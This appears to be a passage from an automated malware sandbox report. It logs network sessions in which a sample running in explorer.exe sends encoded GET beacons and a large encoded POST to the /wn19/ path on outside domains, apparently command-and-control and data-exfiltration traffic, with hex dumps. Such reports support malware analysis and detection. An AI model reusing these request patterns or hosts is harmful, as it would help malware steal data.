                                                                                                  Data Raw: 09 0d d1 87 83 5f 02 7c 06 a6 47 b4 7c 71 88 3e 81 ea b3 f9 29 1a 59 bc 3d 06 80 2c d6 15 04 39 01 22 a1 08 81 b9 b1 f0 ff 16 7e 90 d7 85 1d e5 b5 02 e3 29 36 01 eb 26 41 02 6a d1 65 4e 36 f6 a5 23 b9 db 92 25 c2 ec ea f8 52 fd ad 2b ec 16 7f b6 10 b1 1f 2b d8 29 dc 49 9d bb d9 f7 f9 6c 25 93 b6 43 56 08 17 7a 94 cd 97 e7 0f ac 5b f9 64 d0 74 47 02 fa 68 9b 5c 3c 21 11 a3 15 08 43 47 50 41 54 02 13 8b 3a d1 89 95 76 1a ce 84 76 32 7f 66 a7 06 d9 c6 48 90 08 65 fa 73 59 70 d9 ea a6 bc b3 8b ca c1 48 b1 e7 05 a2 e0 c1 17 9a 0e 90 0d be 23 07 04 6e c8 35 5d f3 97 81 34 1b 5b 5d 22 f2 5a 32 d5 05 90 0d ca 70 46 1d f1 fb 00 b0 76 43 fd 97 08 47 5a 8a fa 24 a2 59 72 31 20 ec ae bc 60 91 e8 f7 da cd b0 7d 5d 11 06 28 6b d0 da 14 fe 26 20 13 62 8c ca 7a a0 c0 fa 24 66 2b a0 43 70 1d 6d 43 01 d6 bb e6 54 05 70 7b 07 8e cd 11 a3 9a fc 81 66 28 00 2a c0 b0 54 e0 1a ad a5 c5 ee 78 b9 6e f2 3e 6f ae a4 5d cd 6c 1f da d6 d3 4e 98 e0 19 92 64 9d a3 b2 c2 d0 8a 19 e9 9b 75 45 02 e4 90 57 51 64 75 62 9d 34 95 8f 2c a4 13 8f 00 f5 83 b7 90 51 26 00 b4 0e 91 96 99 40 93 22 54 08 b9 01 2f 5e 45 05 dd e4 74 68 2a 1e 86 32 69 c5 70 04 5a 21 ca 95 71 31 3a b2 07 1f 84 1a 98 82 42 3e 1a 1c ae 58 5b 04 40 7a 44 6a 6e 15 9a e1 1b 3b 74 36 b6 65 6f 2b ad 86 e8 a9 bb 72 c0 dc 72 6c fb b9 66 f2 4c 2b df 1a 84 1e 92 5e 4b 25 d6 d3 36 9e d7 a8 99 ff 2c 24 43 07 90 c8 06 aa 8c 86 c8 bd 05 07 90 36 a4 80 85 86 6c 6a 20 b4 98 46 e0 11 e8 8c 6a ec ed 35 8f b7 f1 7c bd fe 0a 3a ac de 73 c4 6f e9 76 1b 7e 71 7e ca af ae 34 eb 08 79 f5 52 42 ad d0 d7 10 5a c7 76 8c b5 d1 64 f6 c0 9b f3 d7 61 30 7a a2 09 d0 97 18 4d 97 ec f2 8b 8f 5e 27 d6 72 92 dd b3 76 72 45 4e b0 1d d4 d0 f0 7e 7d be ed 07 a0 d7 cf 27 88 64 03 d8 05 94 bc 60 e3 f5 39 f3 13 d0 05 0f d5 9e 22 66 3e 94 88 56 65 b7 b7 af ee 0f 69 82 dc 5f 64 c0 02 db fc ac ef 73 bd 76 a7 38 39 70 90 ef 7d 70 d9 b7 49 42 f1 65 14 db 64 be 57 3c b9 7f 8c f6 f3 28 72 be bf c0 e2 68 80 f7 8d 52 78 85 36 7a d1 ee 20 58 81 6f de a2 07 81 c0 2b 02 55 26 5f 83 9f a6 c9 2e 70 c2 9d 68 99 ac 08 76 d9 6b 6e 79 32 5c 10 5f 87 fa 96 9e b3 d6 0a 4e 03 97 a2 fe 9b bf 5f f9 d8 90 a7 3c e2 3b d4 47 8e 3c f2 f5 b1 2d 7c 8e 50 63 26 8c 73 90 94 4f 39 7c 5f e1 34 db 60 b9 02 05 8f ed a4 d1 3e b2 fd f3 8a f4 8d 50 09 4b f0 27 70 eb fb a9 4d 2f 90 11 0e 11 7d 8d ad 32 3f 2d 67 42 26 33 b1 46 ee 03 1f 2c 80 5e b3 a4 a6 14 d3 66 7a 50 ee 59 3b 21 d9 6b f3 8c 9a b9 db f0 69 96 d7 47 5f 31 d0 74 ef 6d 2b 73 8a 4b bd 5c 8d f4 0b 4b d3 9f 6a 3d 3d 64 50 07 10 ad 88 9f fc fb c4 9a f8 b4 5d 53 81 5c 91 3c 6e 91 6d b3 35 10 2c b8 b2 0a 70 7e 0b 3d 79 fd d4 05 c8 44 05 94 89 8b ef 3c 40 d7 b5 75 6a f3 78 3e 7c d7 8c 1e db 20 eb a0 a3 03 c3 06 aa 2b 95 65 d0 fe f0 a3 78 4d 4d 13 4d 36 46 9c 3f 0c 24 43 75 83 76 60 21 2d bf e8 79 fc 89 7a 25 c2 ec ea a0 d1 15 a4 a0 24 95 bf 8a 9b b1 1c ea 5b e9 f4 4a 95 44 38 67 f9 6c 25 93 b6 43 56 08 17 7a 94 cd 97 e7 0f ac 5b f9 64 d0 74 47 02 fa 68 9b 5c 3c 21 11 63 15 08 43 49 4f fb 5a 02 a7 82 f7 f0 31 94 3a d7 ef d0 1e 5b 0c 46 d7 74 b6 a1 3a f1 65 45 99 12 37 1e b6 9e 86 de d6 ab b8 b4 26 91 8e 6b 82 a4 8e 44 ba 63 ff 69 db 0d 0a 09 64 ec 35 5d f3 97 81 34 1b f0 a1 2a 18 b5 af b3 bc 7f 90 ac c9 a9 80 97 42 f4 b0 bb fa 54 0a 6e fe ae 8a 02 9d 4e c4 14 88 d4 ec 55 05 8e 0c 8e 4e 88 a4 d3 15 b2 8c 60 91 6b d0 da 14 fe 26 20 13 62 8c ca 7a a0 c0 fa 24 36 6e
                                                                                                  Data Ascii: _|G|q>)Y=,9"~)6&AjeN6#%R++)Il%CVz[dtGh\<!CGPAT:vv2fHesYpH#n5]4[]"Z2pFvCGZ$Yr1 `}](k& bz$f+CpmCTp{f(*Txn>o]lNduEWQdub4,Q&@"T/^Eth*2ipZ!q1:B>X[@zDjn;t6eo+rrlfL+^K%6,$C6lj Fj5|:sov~q~4yRBZvda0zM^'rvrEN~}'d`9"f>Vei_dsv89p}pIBedW<(rhRx6z Xo+U&_.phvkny2\_N_<;G<-|Pc&sO9|_4`>PK'pM/}2?-gB&3F,^fzPY;!kiG_1tm+sK\Kj==dP]S\<nm5,p~=yD<@ujx>| +exMMM6F?$Cuv`!-yz%$[JD8gl%CVz[dtGh\<!cCIOZ1:[Ft:eE7&kDcid5]4*BTnNUN`k& bz$6n


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  1192.168.11.2049768217.160.0.1880C:\Windows\explorer.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  May 10, 2022 14:25:21.460128069 CEST9365OUTGET /wn19/?AVnXAh=A9tPw5wW+2gVzhiAst2uEYMxl8Qbhtbs4UZqv+cXLFe4/YHx2PgN7R7cqpKWqQ64E5aF&Vb3pDf=BHT0MRp HTTP/1.1
                                                                                                  Host: www.borneadomicile.com
                                                                                                  Connection: close
                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                  Data Ascii:
                                                                                                  May 10, 2022 14:25:21.478069067 CEST9366INHTTP/1.1 404 Not Found
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 837
                                                                                                  Connection: close
                                                                                                  Date: Tue, 10 May 2022 12:25:21 GMT
                                                                                                  Server: Apache
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 4c 65 20 66 69 63 68 69 65 72 20 72 65 71 75 69 73 20 6e 27 61 20 70 61 73 20 26 65 61 63 75 74 65 3b 74 26 65 61 63 75 74 65 3b 20 74 72 6f 75 76 26 65 61 63 75 74 65 3b 2e 0a 49 6c 20 70 65 75 74 20 73 27 61 67 69 72 20 64 27 75 6e 65 20 65 72 72 65 75 72 20 74 65 63 68 6e 69 71 75 65 2e 20 56 65 75 69 6c 6c 65 7a 20 72 26 65 61 63 75 74 65 3b 65 73 73 61 79 65 72 20 75 6c 74 26 65 61 63 75 74 65 3b 72 69 65 75 72 65 6d 65 6e 74 2e 20 53 69 20 76 6f 75 73 20 6e 65 20 70 6f 75 76 65 7a 20 70 61 73 20 61 63 63 26 65 61 63 75 74 65 3b 64 65 72 20 61 75 20 66 69 63 68 69 65 72 20 61 70 72 26 65 67 72 61 76 65 3b 73 20 70 6c 75 73 69 65 75 72 73 20 74 65 6e 74 61 74 69 76 65 73 2c 20 63 65 6c 61 20 73 69 67 6e 69 66 69 65 20 71 75 27 69 6c 20 61 20 26 65 61 63 75 74 65 3b 74 26 65 61 63 75 74 65 3b 20 73 75 70 70 72 69 6d 26 65 61 63 75 74 65 3b 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Le fichier requis n'a pas &eacute;t&eacute; trouv&eacute;.Il peut s'agir d'une erreur technique. Veuillez r&eacute;essayer ult&eacute;rieurement. Si vous ne pouvez pas acc&eacute;der au fichier apr&egrave;s plusieurs tentatives, cela signifie qu'il a &eacute;t&eacute; supprim&eacute;. </p> </body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  10192.168.11.2049784209.99.40.22280C:\Windows\explorer.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  May 10, 2022 14:29:09.169404030 CEST10487OUTGET /wn19/?AVnXAh=041CpAoA8aE4nytHYFLnZX+bZp2z2B9kFJxelKlpXP3rI73HFbKkzWSC2hacigUxO+LM&Vb3pDf=BHT0MRp HTTP/1.1
                                                                                                  Host: www.linqxw.com
                                                                                                  Connection: close
                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                  Data Ascii:
                                                                                                  May 10, 2022 14:29:09.460515022 CEST10489INHTTP/1.1 200 OK
                                                                                                  Date: Tue, 10 May 2022 12:29:09 GMT
                                                                                                  Server: Apache
                                                                                                  Set-Cookie: vsid=919vr3997313492610828; expires=Sun, 09-May-2027 12:29:09 GMT; Max-Age=157680000; path=/; domain=www.linqxw.com; HttpOnly
                                                                                                  X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_iGyK23qWCi9ySWncGuz32s+CTVOicqxUJIXB3qxkKwsIm2IERdtH4Uz1V9WP5MOmf0siF+Q5rJMcB66cjaG5JQ==
                                                                                                  Keep-Alive: timeout=5, max=123
                                                                                                  Connection: Keep-Alive
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Data Raw: 35 38 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 6e 71 78 77 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 6e 71 78 77 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 66 75 6e 63 74 69 6f 6e 20 68 61 6e 64 6c 65 41 42 50 44 65 74 65 63 74 28 29 7b 74 72 79 7b 69 66 28 21 61 62 70 29 20 72 65 74 75 72 6e 3b 76 61 72 20 69 6d 67 6c 6f 67 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6d 67 22 29 3b 69 6d 67 6c 6f 67 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 30 70 78 22 3b 69 6d 67 6c 6f 67 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 30 70 78 22 3b 69 6d 67 6c 6f 67 2e 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 6e 71 78 77 2e 63 6f 6d 2f 73 6b 2d 6c 6f 67 61 62 70 73 74 61 74 75 73 2e 70 68 70 3f 61 3d 65 6e 64 6a 4d 6d 52 6d 51 32 4a 73 4e 47 78 6b 55 30 67 78 62 6b 46 4a 55 56 56 79 56 6c 52 78 5a 31 63 33 5a 6e 68 48 54 47 46 47 64 46 4e 49 4f 46 64 70 53 6a 52 52 4d 56 4e 6d 57 47 63 78 4f 54 52 6e 4c 32 35 47 52 6b 46 49 4d 6b 74 4c 59 6b 46 61 59 54 68 6d 4e 6d 35 70 4d 32 45 31 59 56 4a 7a 4b 7a 4a 4c 51 55 31 34 64 6a 4a 34 53 47 67 76 51 32 39 72 65 55 68 79 59 6b 49 32 64 55 38 32 52 6d 68 7a 64 6a 55 30 57 57 74 31 65 56 6c 34 57 45 64 7a 59 31 68 69 56 55 70 33 62 47 4a 6d 62 33 56 4d 4f 45 59 3d 26 62 3d 22 2b 61 62 70 3b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 69 6d 67 6c 6f 67 29 3b
                                                                                                  Data Ascii: 5890<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.linqxw.com/px.js?ch=1"></script><script type="text/javascript" src="http://www.linqxw.com/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.createElement("img");imglog.style.height="0px";imglog.style.width="0px";imglog.src="http://www.linqxw.com/sk-logabpstatus.php?a=endjMmRmQ2JsNGxkU0gxbkFJUVVyVlRxZ1c3ZnhHTGFGdFNIOFdpSjRRMVNmWGcxOTRnL25GRkFIMktLYkFaYThmNm5pM2E1YVJzKzJLQU14djJ4SGgvQ29reUhyYkI2dU82RmhzdjU0WWt1eVl4WEdzY1hiVUp3bGJmb3VMOEY=&b="+abp;document.body.appendChild(imglog);


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  11192.168.11.2049785209.99.40.22280C:\Windows\explorer.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  May 10, 2022 14:29:11.751184940 CEST10520OUTPOST /wn19/ HTTP/1.1
                                                                                                  Host: www.linqxw.com
                                                                                                  Connection: close
                                                                                                  Content-Length: 227520
                                                                                                  Cache-Control: no-cache
                                                                                                  Origin: http://www.linqxw.com
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Accept: */*
                                                                                                  Referer: http://www.linqxw.com/wn19/
                                                                                                  Accept-Language: en-US
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  Data Raw: 41 56 6e 58 41 68 3d 38 61 35 34 33 67 42 79 39 39 51 4a 79 51 31 46 47 51 65 4d 59 43 75 31 65 37 75 4f 28 51 4e 46 52 5a 73 32 7e 61 51 77 52 63 71 78 4f 76 76 32 4b 4c 62 38 77 79 62 5f 6c 77 7e 58 69 6c 77 4b 41 66 62 6d 50 68 36 6f 45 32 56 50 4d 66 65 7a 61 30 43 47 79 6e 70 32 28 57 79 74 7a 6c 4c 44 6b 37 45 70 61 38 65 4c 72 77 4f 38 68 67 41 66 77 4a 45 52 58 51 78 44 77 46 72 46 50 33 57 75 43 56 42 54 61 74 4e 38 4c 4f 33 67 62 57 69 64 33 74 76 33 63 75 7e 66 5a 48 55 65 58 30 5a 46 6d 47 66 66 39 54 53 72 48 61 74 57 72 66 4d 69 5a 70 67 64 6e 54 4e 68 78 74 58 2d 36 4e 6c 42 70 6f 76 52 6f 2d 4d 73 79 32 75 52 66 6c 6c 53 46 54 77 54 58 75 5a 36 32 66 43 2d 64 4f 7e 71 59 61 6f 42 33 68 39 71 6a 76 4c 75 43 64 76 50 48 48 35 52 37 54 52 50 58 76 47 65 54 44 77 52 72 44 6e 57 75 36 36 5a 4b 7a 33 58 4d 5a 76 49 64 46 4d 4c 43 2d 76 57 58 54 4f 45 71 6f 63 56 79 76 34 6b 31 6f 72 39 54 7a 4d 35 37 49 72 31 4b 65 67 30 48 4f 38 35 56 50 6e 41 71 4b 36 6c 33 4c 33 6e 30 37 28 79 56 79 28 69 64 4e 6e 6a 72 4b 76 77 56 4e 30 48 47 4d 59 45 78 77 70 68 72 74 53 54 72 71 67 49 68 35 64 57 4b 47 70 41 33 54 70 76 6f 45 47 73 74 62 30 4a 52 6f 42 5a 6b 50 59 6b 64 59 73 74 41 70 6a 32 54 38 50 47 69 71 6b 6f 53 4a 30 43 79 6c 69 53 7e 33 56 6e 38 70 57 39 53 52 7e 5a 73 34 75 67 38 53 28 70 7e 62 55 74 59 49 73 50 79 76 31 70 4b 33 49 74 63 71 32 65 30 55 34 73 47 32 79 45 6d 6c 33 48 38 34 70 57 6b 34 51 57 71 49 35 78 4e 4c 34 61 6c 68 37 63 61 6f 34 68 71 56 4a 73 67 67 41 2d 76 6c 63 6f 4d 50 33 50 70 45 50 78 57 76 73 71 31 56 69 71 57 2d 7a 61 67 6c 53 69 79 4b 71 44 6a 75 53 6c 65 41 38 68 42 45 62 48 4b 55 4c 78 51 74 35 74 4d 4a 44 58 68 35 37 45 6e 33 57 47 7a 5f 6e 4a 6c 5f 6a 61 6d 45 4c 62 61 30 46 70 57 64 52 51 30 39 4e 5f 41 4f 6a 67 35 67 77 46 52 4d 64 39 5a 64 28 31 75 65 52 53 76 32 5a 70 79 64 4e 74 35 7a 6c 50 57 66 6f 44 37 31 73 65 33 53 6d 7a 38 74 32 59 4f 6e 69 4b 51 6a 4e 42 4e 51 71 41 37 66 78 45 5a 74 4b 42 35 57 68 63 6f 68 61 4c 67 2d 6a 71 47 34 32 35 77 58 6d 79 7e 63 4a 30 72 34 62 58 56 54 6e 69 33 57 58 70 62 48 65 37 49 49 75 6a 51 30 34 55 62 33 57 74 78 42 6f 31 7a 47 75 38 67 48 38 70 72 4a 5a 4b 50 62 7a 56 39 6b 45 4c 68 43 56 6b 54 55 56 5f 4c 64 62 42 52 6c 79 61 71 69 41 53 53 37 6d 4f 71 4a 56 76 68 69 45 58 46 51 63 4c 6e 6f 6f 62 7a 35 73 50 33 76 43 5a 50 31 53 5f 54 44 4b 2d 6d 62 33 5f 4d 42 50 62 51 6f 78 38 4b 62 73 7a 67 72 46 6c 6c 47 7e 55 68 5f 53 39 41 4b 71 6d 50 72 42 6c 66 36 28 51 76 54 33 34 28 53 69 41 31 52 4e 43 33 5f 6c 4a 37 48 55 56 6d 78 4d 6b 52 37 75 7a 41 77 71 71 6a 66 61 61 77 68 6b 44 59 55 79 75 4b 41 45 79 30 58 6e 7a 51 66 51 4e 4b 5f 57 5f 38 37 54 74 50 36 36 61 4b 4d 7e 4c 45 44 4c 47 6c 63 51 42 71 4c 55 34 64 38 54 56 43 6f 54 35 7e 37 36 68 73 30 4a 62 4a 6e 36 52 6f 55 51 62 6f 62 55 61 48 72 33 62 42 73 4d 74 44 49 79 38 4d 64 36 51 4a 71 69 7a 49 76 67 42 64 6b 34 76 36 70 31 67 6e 45 70 2d 31 39 67 44 46 4b 6f 48 56 61 76 5f 59 5f 5a 53 45 41 78 43 30 76 62 41 63 4c 28 57 75 75 4f 5f 37 5f 39 52 77 32 76 33 42 71 48 54 30 59 5a 37 54 31 35 64 6d 54 36 6a 31 44 76 58 34 31 4a 67 49 58 52 46 65 56 43 64 37 62 7a 44 52 73 7a 48 45 47 5a 73 37 73 6f 75 45 75 46 48 31 37 76 4b 55 6c 7a 64 38 6c 4e 37 62 46 47 77 7a 50 76 63 64 67 55 6d 75 6b 31 69 34 47 33 30 57 65 7e 6f 77 31 6b 67 6e 53 4b 37 39 62 50 57 39 46 7a 45 6f 36 59 37 4d 6d 57 36 76 37 36 54 76 5f 49 6e 78 39 76 30 32 6f 54 71 55 71 61 37 4c 47 6b 59 64 39 50 68 6e 74 31 6c 69 4b 54 77 74 4f 64 5a 53 74 68 4b 48 50 55 31 79 74 57 61 43 32 37 4f 7a 79 34 72 6d 63 71 63 77 54 57 70 30 64 45 79 4f 33 4d 6c 57 42 57 64 67 52 62 31 7a 75 66 76 6e 56 71 73 34 49 76 44 68 44 37 56 77 36 48 47 70 46 6e 73 79 74 41 5a 6a 6f 28 4a 43 67 72 6e 56 79 6c 72 70 6d 4f 57 4d 62 36 75 48 68 76 69 38 48 6d 6e 7e 58 6d 37 73 66 71 64 32 49 66 53 46 6f 41 43 6a 56 53 4a 70 4e 53 6f 53 6e 45 76 4a 5f 39 59 71 31 36 52 28 66 6e 77 36 6e 57 57 39 63 50 6e 4e 53 67 46 72 73 52 2d 69 55 58 69 38 6e 68 45 61 6d 6a 42 54 59 4a 61 75 4f 51 66 35 71 41 33 30 51 4c 6b 4e 65 6b 6b 4b 61 7a 4a
                                                                                                  Data Ascii: AVnXAh=8a543gBy99QJyQ1FGQeMYCu1e7uO(QNFRZs2~aQwRcqxOvv2KLb8wyb_lw~XilwKAfbmPh6oE2VPMfeza0CGynp2(WytzlLDk7Epa8eLrwO8hgAfwJERXQxDwFrFP3WuCVBTatN8LO3gbWid3tv3cu~fZHUeX0ZFmGff9TSrHatWrfMiZpgdnTNhxtX-6NlBpovRo-Msy2uRfllSFTwTXuZ62fC-dO~qYaoB3h9qjvLuCdvPHH5R7TRPXvGeTDwRrDnWu66ZKz3XMZvIdFMLC-vWXTOEqocVyv4k1or9TzM57Ir1Keg0HO85VPnAqK6l3L3n07(yVy(idNnjrKvwVN0HGMYExwphrtSTrqgIh5dWKGpA3TpvoEGstb0JRoBZkPYkdYstApj2T8PGiqkoSJ0CyliS~3Vn8pW9SR~Zs4ug8S(p~bUtYIsPyv1pK3Itcq2e0U4sG2yEml3H84pWk4QWqI5xNL4alh7cao4hqVJsggA-vlcoMP3PpEPxWvsq1ViqW-zaglSiyKqDjuSleA8hBEbHKULxQt5tMJDXh57En3WGz_nJl_jamELba0FpWdRQ09N_AOjg5gwFRMd9Zd(1ueRSv2ZpydNt5zlPWfoD71se3Smz8t2YOniKQjNBNQqA7fxEZtKB5WhcohaLg-jqG425wXmy~cJ0r4bXVTni3WXpbHe7IIujQ04Ub3WtxBo1zGu8gH8prJZKPbzV9kELhCVkTUV_LdbBRlyaqiASS7mOqJVvhiEXFQcLnoobz5sP3vCZP1S_TDK-mb3_MBPbQox8KbszgrFllG~Uh_S9AKqmPrBlf6(QvT34(SiA1RNC3_lJ7HUVmxMkR7uzAwqqjfaawhkDYUyuKAEy0XnzQfQNK_W_87TtP66aKM~LEDLGlcQBqLU4d8TVCoT5~76hs0JbJn6RoUQbobUaHr3bBsMtDIy8Md6QJqizIvgBdk4v6p1gnEp-19gDFKoHVav_Y_ZSEAxC0vbAcL(WuuO_7_9Rw2v3BqHT0YZ7T15dmT6j1DvX41JgIXRFeVCd7bzDRszHEGZs7souEuFH17vKUlzd8lN7bFGwzPvcdgUmuk1i4G30We~ow1kgnSK79bPW9FzEo6Y7MmW6v76Tv_Inx9v02oTqUqa7LGkYd9Phnt1liKTwtOdZSthKHPU1ytWaC27Ozy4rmcqcwTWp0dEyO3MlWBWdgRb1zufvnVqs4IvDhD7Vw6HGpFnsytAZjo(JCgrnVylrpmOWMb6uHhvi8Hmn~Xm7sfqd2IfSFoACjVSJpNSoSnEvJ_9Yq16R(fnw6nWW9cPnNSgFrsR-iUXi8nhEamjBTYJauOQf5qA30QLkNekkKazJm4AbalLMhTHIHUYCUrE_K9wD9G4_Bwv9vROdM13oJ2vNhj7Zyxi45lR-8tVbdprzyTXi7mN1Qnwtsy3wma80IeV2nTts7HrkkZ1NG7BSHo3_KvGOOO6CpmdnHwo0mKQ8lAuQIhn0eMUbpLMdq0Jzs9VeuvDM7FVPW4CzI2bRy6EMj5bcb17sbLnyRTdJ1WwOW18u8YlRuEyUOKKyoRGtaAnCbeyGsDK722cOuFk54suaq8p-ZXP9zDkvzPdFfewZ2DKUwKcwrVY1DIC2D5YvuNDrsO(RMulu4wwfynzqR9M6ZxOiMWQqE3sL3F(5MTphKGb7lwiyWuebg7UxIrx4uugwn0I6i8K8hONVcIePC5TSMyDtZSYJa9Y3x3dy9jpffmVwzJMM3iBAu2a-ZfKcqUAAHT5NCeywhZflKLj88Sjvk61b83n1a6qnrSsIF7QJaBN7zf7Jo6s6qeX_fIPxiw7BH7DlNfFMNvsxkfQrkkLDW5FR(ZIXvfxhn8M_L1346qbgN5~_zXnf6bZPZ8A1ivkSQWLguYsk7qT5buRN~UWSzlD9NaP8REdNzQPhOLxGS0to9u9BZSOp8wz9NRvUbJqi1x93ZZH_o_1RfTZpf0MhCZQ3Bfv3GXpnKFgrD4bX41MPlFegkE~v8x3U7OfLMpEgFHY6kvnWEKgb6FI2JVmOLDxe~SC4JvFPORfab-LEkA7rreoqbqkwXG6mxnBCSCeu9_RuYGBKGdf7IIkw5X0TPt9Pk5JPXUdO75SaiOyq(HoSf80QhppsNawMN07mfbHPW3kaew(ekjFji6jWyqG4pUFjCyFjN0NsqwmL5P~aqR~3ECx6e6z3qi7ycBQebeLQ7BZJccfKdmz31oDFXvnNO6ZXCQQR8p(G3z68K4lPgAuM92KQmsBKHHJ-giaYbijv5eKRquNaOT6Vd2n_MNkHovX9mZO_X1ygBr4YBKZGMFxuqP9IQn0VopVYpzGwE0oFgjVL~cTBro4P73YELBOX~vTKKUu5zozcMo9xU9sNFG6irf1R1TNkof0SSWhwQOIruoqDAUVk5wh4aGFxvQwQLcND(LJKYKTfiyEglPijf7nEx4Xb0t41Y8Qysjj1zwtZgNs9xxa7drTduGeXdVxFiIxjyridzkZ9(LGnOvxC9XcauP93D42w5KPZTJNdKv4u4EEG5gL453oZ3C6kmMzdtQ9eWn7aK7KtJ4Ysg5mfvirCiGtA6vYrJc2GbShPJ7skG-w8Vv~m8NkJF1P5VyTeBEO_iAM9SChi8pwgldKTAAC1V-LfO_OHnoQyWQB4Wn~nim0rFY2h